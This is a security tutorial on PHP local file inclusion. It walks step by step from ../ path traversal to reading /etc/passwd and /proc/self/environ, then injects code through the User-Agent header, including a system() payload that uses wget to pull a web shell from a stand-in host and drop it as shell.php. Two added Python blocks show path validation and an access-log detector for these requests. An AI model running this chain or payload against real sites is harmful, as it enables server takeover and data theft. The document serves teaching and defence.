Amir Roknifard
Amir Roknifard is a cyber security professional with years of professional experience and a proven track record in cyber security management and risk consulting, helping boards to better manage their cyber risk and transform their cyber security practices. He is the founder of Academician Journal, which aims to close the gap between academia and the InfoSec industry. He has also authored and reviewed books, published articles, and developed a master's degree program in cyber security.

File Inclusion Attack

A file inclusion vulnerability allows an attacker to access unauthorised files on the web server and, in some cases, to execute malicious code, by abusing the application's 'include' functionality. Local file inclusion (LFI) is the inclusion of a file that already exists on the web server. The vulnerability arises when user input controls the path of the file that is included. When that input is not properly sanitised, an attacker can supply the location of well-known system files and read these sensitive files.

Let's suppose this website is vulnerable to a local file inclusion attack:

www.roknifard.com/view.php?page=contact.php

Now let's replace contact.php with ../ and try the new URL:

www.roknifard.com/view.php?page=../

After requesting this page we get an error. That is a strong indication of a Local File Inclusion vulnerability.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/roknifard/public_html/roknifard.com/view.php on
line 1337

Now let's try to include /etc/passwd to confirm that the page is vulnerable to Local File Inclusion:

www.roknifard.com/view.php?page=../../../etc/passwd

We get an error again, so we add more ../ segments to climb further up the directory tree towards the /etc/passwd file:

www.roknifard.com/view.php?page=../../../../../etc/passwd

If you get a page like the following, you have successfully included the /etc/passwd file:

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
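The traversal above works because view.php hands the raw page parameter to include. As an added example that is not part of the original article, the Python code below models the decision view.php should make before including anything: either accept only names from a fixed allowlist, or decode the parameter once, normalise it and require the result to stay inside the pages directory. PAGES_DIR and ALLOWED_PAGES are assumed values chosen for the illustration; the same two checks map directly onto PHP's in_array() and realpath().

```python
import posixpath
from urllib.parse import unquote

# Assumed layout: a flat directory of templates that view.php may include.
# Both values are placeholders for this example, not taken from the article.
PAGES_DIR = "/var/www/roknifard/pages"
ALLOWED_PAGES = {"contact.php", "about.php", "index.php"}


def resolve_page_allowlist(page: str):
    """Strict fix: only a known set of template names is ever included.

    Returns the absolute path to include, or None to refuse the request.
    """
    if page in ALLOWED_PAGES:
        return posixpath.join(PAGES_DIR, page)
    return None


def resolve_page_contained(page: str):
    """Looser fix: normalise the path and require it to stay under PAGES_DIR.

    Handles the cases from the article: ../ sequences, %2F-encoded sequences,
    absolute paths such as /etc/passwd, and null-byte truncation tricks.
    """
    decoded = unquote(page)            # judge the path the way the OS will see it
    if "\x00" in decoded:               # "contact.php%00.jpg" style truncation
        return None
    # posixpath.join discards PAGES_DIR when `decoded` is absolute, and
    # normpath collapses every ../ lexically, so traversal shows up as a
    # candidate that no longer starts with PAGES_DIR.
    candidate = posixpath.normpath(posixpath.join(PAGES_DIR, decoded))
    if posixpath.commonpath([PAGES_DIR, candidate]) != PAGES_DIR:
        return None
    if not candidate.endswith(".php"):  # templates only, never arbitrary files
        return None
    return candidate


if __name__ == "__main__":
    # Constructed inputs mirroring the article's requests.
    for attempt in ("contact.php", "../", "../../../../../etc/passwd",
                    "..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"):
        print(f"{attempt!r:55} -> {resolve_page_contained(attempt)}")
```

The allowlist version is the one to prefer when the set of pages is known; the containment version is the fallback when pages are added dynamically, and it must still run after URL decoding so that encoded ../ sequences are judged on the real path.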

We have successfully included a file, and the next step is to include the /proc/self/environ file. Replace /etc/passwd with /proc/self/environ:

www.roknifard.com/view.php?page=../../../../../proc/self/environ

If you get something like the following, you have successfully included the /proc/self/environ file:

DOCUMENT_ROOT=/home/roknifard/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.roknifard.com
HTTP_REFERER=http://www.roknifard.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/roknifard/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@roknifard.com
SERVER_NAME=www.roknifard.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.roknifard.com Port 80

/proc/self/environ is accessible. If you get a blank page or an error, /proc/self/environ is not accessible or the operating system is FreeBSD.

Now let's inject our malicious code into /proc/self/environ. Because the environ file reflects the request headers (note HTTP_USER_AGENT in the output above), the code can be placed in the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent: start Tamper Data in Firefox and re-request the URL

www.roknifard.com/view.php?page=../../../../../proc/self/environ

Now tamper with this request, put your uploader script in the User-Agent header and submit. You will get an uploader on the /proc/self/environ page; browse and upload your shell.

You can also upload your shell by downloading it remotely with the wget command:

<?system('wget www.hacker.com/shell.txt -O shell.php');?>

Add this command to the User-Agent header and request the page. The command is executed through system(), downloads the .txt shell from www.hacker.com/shell.txt and saves it as shell.php in the website directory, so our shell is created. If this didn't work, try exec(), because system() can be disabled on the web server from php.ini.

Now let's check whether our malicious code was successfully injected by requesting the shell:

www.roknifard.com/shell.php

Our shell is there. Injection was successful.
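Every step of this chain leaves a trace in the web server's access log: ../ sequences (plain or %2F-encoded) in the query string, requests for /etc/passwd or /proc/self/environ answered with 200, and PHP tags in the User-Agent or Referer header. As an added example that is not part of the original article, the Python script below parses Apache combined-format log lines and flags those indicators. The log lines are constructed for the illustration and the rule names are my own.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Files whose inclusion is the signature of the walkthrough above.
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow", "/proc/self/environ")

# Constructed sample log, not real traffic: a normal request, the /etc/passwd
# probe, the /proc/self/environ request carrying a PHP tag in the User-Agent,
# and an unrelated request from another client.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/Oct/2023:13:55:52 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 3021 "-" "<?php echo 1; ?>"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "curl/8.0"',
]


def decode_fully(value: str, rounds: int = 3) -> str:
    """URL-decode repeatedly so double-encoded ../ (%252E%252E%252F) is caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_line(line: str):
    """Return the named fields of one combined-format line, or None if it does not parse."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None


def classify(entry: dict) -> list:
    """Apply the LFI indicators to one parsed entry; returns the matching rule names."""
    findings = []
    target = decode_fully(entry["target"])
    if "../" in target or "..\\" in target:
        findings.append("path_traversal")
    if any(path in target for path in SENSITIVE_PATHS):
        findings.append("sensitive_file")
    # Code injected via /proc/self/environ rides in a request header, so a PHP
    # open tag in User-Agent or Referer is the tell for the final step.
    for header in ("ua", "referer"):
        if "<?" in decode_fully(entry[header]):
            findings.append(f"php_tag_in_{header}")
    return findings


def scan(lines) -> list:
    """Scan an iterable of log lines and return one record per suspicious request."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        findings = classify(entry)
        if findings:
            hits.append({
                "ip": entry["ip"],
                "target": entry["target"],
                "status": entry["status"],  # 200 on a sensitive file means the read succeeded
                "findings": findings,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['status']} {hit['target']} -> {', '.join(hit['findings'])}")
```

Decoding before matching matters: the environ output in the article shows the same request both as ../ and as ..%2F, and a rule that only looks for the literal ../ misses half the traffic. The status code is kept in each record because a 200 on /etc/passwd or /proc/self/environ is the difference between an attempt and a confirmed disclosure.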
